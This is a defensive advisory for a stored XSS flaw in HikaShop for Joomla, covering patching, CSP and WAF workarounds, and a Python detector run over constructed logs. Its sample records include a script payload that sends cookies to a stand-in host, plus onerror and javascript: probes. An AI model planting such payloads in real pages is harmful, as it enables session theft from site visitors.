CVE-2024-40746

5.4 MEDIUM

📋 TL;DR

A stored cross-site scripting (XSS) vulnerability in the HikaShop component for Joomla lets an attacker who can edit a product save JavaScript in its description. The script then runs in the browser of anyone who views that product, every time the page is loaded, until the description is cleaned or the component is updated. Joomla sites running HikaShop versions before 5.1.1 are affected.

💻 Affected Systems

Products:
  • HikaShop Joomla Component
Versions: All versions < 5.1.1
Operating Systems: All operating systems running Joomla
Default Config Vulnerable: ⚠️ Yes
Notes: Affects every Joomla installation running a vulnerable HikaShop version. The flaw is in how the product description field is handled: script in the description is stored and rendered to visitors instead of being filtered or encoded.

📦 What is this software?

HikaShop is an e-commerce (shopping cart) extension for the Joomla CMS. Products, including their rich-text descriptions, are managed from the Joomla administrator panel and rendered on the public store pages.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An injected script runs with the viewer's origin and session, so it can steal session cookies that are not HttpOnly, drive an administrator's browser to submit privileged requests (account takeover, configuration changes), deface the store, or redirect shoppers to malicious sites, potentially leading to complete site compromise.

🟠

Likely Case

A user with product editing rights plants a script that steals visitor session data, performs actions as authenticated users, or shows phishing or fake payment content to shoppers on the product page.

🟢

If Mitigated

If the description is filtered against an allowlist of safe HTML on save, or output-encoded where it is rendered, the injected payload is shown (or dropped) as inert text rather than executed as code.

🌐 Internet-Facing: HIGH
🏢 Internal Only: MEDIUM

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires an account that can create or edit HikaShop products (typically a Joomla administrator, or an editor granted product management rights). With that access the attack is trivial: save a description containing a script payload and wait for a victim to open the product page.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 5.1.1

Vendor Advisory: https://www.hikashop.com/

Restart Required: No

Instructions:

1. Back up the site files and database
2. Log into the Joomla administrator panel
3. Go to System > Update > Extensions (Joomla 4/5) or Extensions > Manage > Update (Joomla 3) and install HikaShop 5.1.1 or later
4. Confirm Components > HikaShop > About reports 5.1.1 or higher
5. Review existing product descriptions for script injected before the update; updating stops further injection but does not audit content that is already stored

🔧 Temporary Workarounds

Input Sanitization Filter

Applies to: all platforms

Filter the product description on save against an allowlist of safe HTML tags and attributes (dropping script tags, on* event attributes and javascript: URLs) rather than stripping all HTML: descriptions legitimately contain markup from the WYSIWYG editor, so encoding or stripping everything breaks the store. Joomla's own text filters (System > Global Configuration > Text Filters) restrict what HTML each user group may save through Joomla's input filter; check that your HikaShop version routes the description field through that filter before relying on it.

Content Security Policy

Applies to: all platforms

Serve a Content-Security-Policy whose script-src does not allow 'unsafe-inline', so script injected into a description is refused by the browser. Caveat: Joomla and HikaShop emit inline scripts themselves, so a strict policy without nonces or hashes will break pages; roll it out in Content-Security-Policy-Report-Only mode first (Joomla 4 and later ship a System - HTTP Headers plugin that can emit the header). This reduces impact but does not fix the stored payload.

🧯 If You Can't Patch

  • Restrict product creation and editing to trusted administrators only, and review which Joomla user groups currently hold those rights
  • Add web application firewall rules that inspect the POST body of HikaShop product save requests for script payloads; a rule that only examines the URL or query string misses the description, which is sent in the request body

🔍 How to Verify

Check if Vulnerable:

Open Components > HikaShop > About in the Joomla administrator panel; any version lower than 5.1.1 is vulnerable.

Check Version:

Same page (Components > HikaShop > About). Without admin access, the version is also recorded in the component manifest XML under administrator/components/com_hikashop/.

Verify Fix Applied:

Confirm the version reads 5.1.1 or higher. Then, on a staging copy rather than the live store, save a product description containing a harmless probe (for example an <img> tag with an onerror attribute that only changes document.title) and open the product page as a customer: the probe must be rendered as text or stripped, never executed.

📡 Detection & Monitoring

Log Indicators:

  • Product edits by unexpected accounts or at unusual times, and saves whose description contains <script, javascript: or on*= event attributes
  • Web server access logs record only the URL and query string; the description travels in the POST body, so capture request bodies in a WAF or application log if you want to see the payload

Network Indicators:

  • HTTP POST requests to the HikaShop product save endpoint whose body contains script markers

SIEM Query:

Note that AND binds tighter than OR in most query languages, so the scope condition must be parenthesised separately from the payload conditions, and the payload must be searched in the request body rather than in the URL parameters:

web_requests WHERE url_path CONTAINS 'hikashop' AND (request_body CONTAINS '<script' OR request_body CONTAINS 'javascript:' OR request_body CONTAINS 'onerror=')
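As an added example (not from the original page), the query above expressed as detection logic run over a few constructed request records. The log format, field names and the HikaShop save URL shape (option=com_hikashop&ctrl=product&task=save) are assumptions; the records are JSON lines such as a WAF or application logger that captures POST bodies might produce. The scope test (a HikaShop product write) is applied first, then the payload test, and the body is URL-decoded and entity-decoded before matching so that percent-encoding or HTML entities do not hide the markers.

```python
"""
Detection over constructed request logs for stored XSS via HikaShop product saves.
Added example, not part of the original advisory. A plain access log would not
carry the POST body, so these records are assumed to come from a WAF or
application-level logger that records it.
"""
import json
import re
from html import unescape
from urllib.parse import unquote_plus

# Constructed sample records (not real traffic); field names are assumptions.
SAMPLE_LOGS = [
    '{"ts":"2024-07-01T10:00:00Z","user":"editor1","method":"POST",'
    '"path":"/administrator/index.php?option=com_hikashop&ctrl=product&task=save",'
    '"body":"product_description=%3Cp%3ENice+boots%3C%2Fp%3E"}',
    '{"ts":"2024-07-01T10:05:00Z","user":"editor1","method":"POST",'
    '"path":"/administrator/index.php?option=com_hikashop&ctrl=product&task=save",'
    '"body":"product_description=%3Cscript%3Efetch(%27https%3A%2F%2Fevil.example%2F%27%2Bdocument.cookie)%3C%2Fscript%3E"}',
    '{"ts":"2024-07-01T10:06:00Z","user":"editor1","method":"POST",'
    '"path":"/administrator/index.php?option=com_hikashop&ctrl=product&task=save",'
    '"body":"product_description=%3Cimg+src%3Dx+onerror%3D%22alert(1)%22%3E"}',
    '{"ts":"2024-07-01T10:07:00Z","user":"anon","method":"GET",'
    '"path":"/index.php?option=com_content&view=article&id=5","body":""}',
    '{"ts":"2024-07-01T10:08:00Z","user":"editor1","method":"POST",'
    '"path":"/administrator/index.php?option=com_hikashop&ctrl=product&task=save",'
    '"body":"product_description=%3Ca+href%3D%22JAVASCRIPT%3Aalert(1)%22%3Ebuy%3C%2Fa%3E"}',
]

# Script markers, matched case-insensitively after decoding. \bon\w+\s*= covers
# event-handler attributes such as onerror= and onload=.
XSS_MARKERS = re.compile(r"<script\b|javascript\s*:|\bon\w+\s*=", re.IGNORECASE)


def decode_body(body: str) -> str:
    """Undo percent-encoding, then HTML entities (&#x3c;script ... style evasion)."""
    return unescape(unquote_plus(body))


def is_hikashop_product_write(rec: dict) -> bool:
    """Scope test: a POST to the (assumed) HikaShop product controller."""
    return (rec["method"] == "POST"
            and "option=com_hikashop" in rec["path"]
            and "ctrl=product" in rec["path"])


def find_suspicious_edits(lines):
    """Return (timestamp, user, marker) for every HikaShop product write whose
    decoded body contains a script marker. Scope first, then payload, which is
    the precedence the SIEM query intends."""
    hits = []
    for line in lines:
        rec = json.loads(line)
        if not is_hikashop_product_write(rec):
            continue
        match = XSS_MARKERS.search(decode_body(rec["body"]))
        if match:
            hits.append((rec["ts"], rec["user"], match.group(0).lower()))
    return hits


if __name__ == "__main__":
    for ts, user, marker in find_suspicious_edits(SAMPLE_LOGS):
        print(f"{ts} {user} product save contains {marker!r}")
```

The benign save at 10:00 and the unrelated GET are not reported; the three writes carrying <script, an onerror= handler and a javascript: link are. Because the regex runs on the decoded body, the upper-case JAVASCRIPT: and the percent-encoded tags are still caught; a query that only searches the raw url_parameters field would see none of them.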
